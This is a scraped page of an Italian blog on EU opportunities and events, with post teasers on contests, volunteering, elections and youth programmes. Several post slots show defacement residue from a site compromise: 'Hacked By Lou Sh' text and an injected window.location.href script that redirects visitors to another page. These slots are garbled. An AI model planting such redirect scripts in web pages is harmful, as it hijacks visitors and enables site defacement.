EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Eventi ed opportunità

it

Fiumi di inchiostro, centinaia di note e infinite pennellate di colore sono state da sempre dedicate all’amore che supera gli ostacoli, all’amore che vince, nonostante tutto.

Stavolta a celebrare l’“amor vincit omnia”, di famosa memoria virgiliana, è l’Unione europea con il concorso fotografico, "EU Love without Borders", dedicato alle storie d’amore che superano ogni ostacolo e confine, sia esso culturale, politico, linguistico, geografico, logistico o altro.

Il (...)

it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

Mentre la disoccupazione raggiunge i nuovi massimi storici, in certi settori il lavoro non manca. Anzi, si fatica a trovare mano d’opera. E’ il caso dell’agricoltura, un settore ricco di opportunità per imparare un nuovo mestiere, armati di buona volontà e liberi da pregiudizi.

A tal proposito nasce Job in Country, la nuova piattaforma web di Confederazione Nazionale Coldiretti, come luogo di incontro tra domanda e offerta nel settore agricolo.

L’iniziativa si pone come una grande opportunità per gli studenti degli istituti tecnici agrari, per quelli degli istituti (...)

it

Ogni anno le tonnellate di rifiuti aumentano a dismisura: gettati incautamente sulle strade, sulle spiagge, nelle foreste, negli oceani e nelle zone verdi d’Europa. “Ripuliamo l’Europa” è la campagna di sensibilizzazione del progetto europeo “Settimana europea per la riduzione dei rifiuti” che vuole promuovere le azioni virtuose dei cittadini e diffondere le buone pratiche nella gestione dei rifiuti per un mondo più pulito.

“Ripuliamo l’Europa” non è la prima iniziativa europea messa in atto per fronteggiare il problema dei rifiuti: già in passato ne sono state svolte altre, ma questa darà l’opportunità di riunirle in un unico evento che si terrà il prossimo 10 maggio in tutta Europa. L’obiettivo è quello di coinvolgere (...)

it

In vista delle prossime elezioni europee del 22-25 maggio, il Parlamento europeo lancia la sua prima app per iPad e tablet Android scaricabile gratuitamente dal sito www.boxyourep.eu.

Allo scopo di coinvolgere i cittadini nella politica europea, l’applicazione contiene una serie di “scatole” organizzate per tema che permetteranno agli utenti sia di leggere come l’Aula di Strasburgo ha legiferato negli ultimi cinque anni, sia di conoscere i progetti del prossimo quinquennio su (...)

it

“L’opera umana più bella è essere utile al prossimo”, scriveva Sofocle: migliaia di europei lavorano già come volontari nel mondo intero, assistendo vittime di catastrofi e crisi; molti altri sarebbero pronti a partire se ne avessero la possibilità.

La Commissione europea ha presentato le linee guida del programma EU Aid Volunteers, previsto dal Trattato di Lisbona, rivolto a quanti desiderano rimboccarsi le maniche per intervenire in prima persona nei luoghi colpiti da catastrofi. L’obiettivo generale è quello di fornire opportunità di (...)

it

Martedì 11 febbraio, in oltre 100 Paesi (e per la prima volta anche negli Stati Uniti), è stato celebrato il Safer Internet Day, un’iniziativa della Commissione europea, giunta ormai all’undicesima edizione, che ha avuto come fine quello di promuovere, soprattutto tra i più giovani, un utilizzo sicuro e responsabile dei media.

Erano gli anni Sessanta quando il Dipartimento di Difesa statunitense decise di collegare tra di loro alcune università che si occupavano di progetti militari, sfruttando linee di telecomunicazione ad alta velocità. L’obiettivo era semplice: mettere a punto un sistema di difesa e di (...)

it

Il primo luglio 2014 l’Italia assumerà la Presidenza del Consiglio dell’Unione europea: sei mesi per dirigere l’agenda europea, discutere le priorità e raggiungere conclusioni in un’Europa rinforzata dalle elezioni del prossimo maggio.

Sei mesi che, se condivisi e sfruttati da tutti gli italiani bruxellesi, riusciranno a promuovere la presidenza italiana e l’Italia attraverso la proposizione e realizzazione di idee e contenuti concreti, realizzabili con un investimento minimo di denaro, consapevoli che mettendo insieme le (...)

it

Spesso in giro si odono voci di giovani che lamentano una scarsa considerazione da parte delle istituzioni e nazionali e, soprattutto, europee. Quale migliore occasione allora se non "L'Evento europeo per i giovani", il quale motto recita "Idee per un'Europa migliore", per far sentire la propria voce? Tanti ragazzi di tutto il continente (si stimano già intorno ai cinquemila) si incontreranno a Strasburgo e cercheranno di avanzare nuove proposte, nuove considerazioni, atte a migliorare un sistema da molti considerato obsoleto e senza futuro, in quanto non prevede la partecipazione massiccia dei giovani, del futuro.

L’European Youth Event 2014 si preannuncia essere un’occasione imperdibile per coloro i quali vogliono sentirsi più partecipi della vita continentale. Numerosi autorevoli professori e vari decision makers saranno presenti nella tre giorni francese in programma a maggio 2014, pronti ad accogliere (...)

it

A partire dal 25 ottobre sono aperte le iscrizioni per prendere parte alla settima edizione del Premio europeo Carlo Magno. Se sei un giovane tra i 16 e i 30 anni con un progetto che promuova l’identità europea e l’integrazione non esitare a partecipare: è l’occasione giusta per mettersi in luce. In palio, oltre al riconoscimento internazionale, anche un premio in denaro e la possibilità di visitare le sedi dell’Europarlamento.

Favorire l’integrazione europea, incoraggiare la nascita di un sentimento comune di identità, far emergere e sviluppare una coscienza europea giovanile e proporre modelli di comportamento per tutti i cittadini all’interno dell’Unione Europea. Sono questi gli obiettivi del “Premio europeo Carlo (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France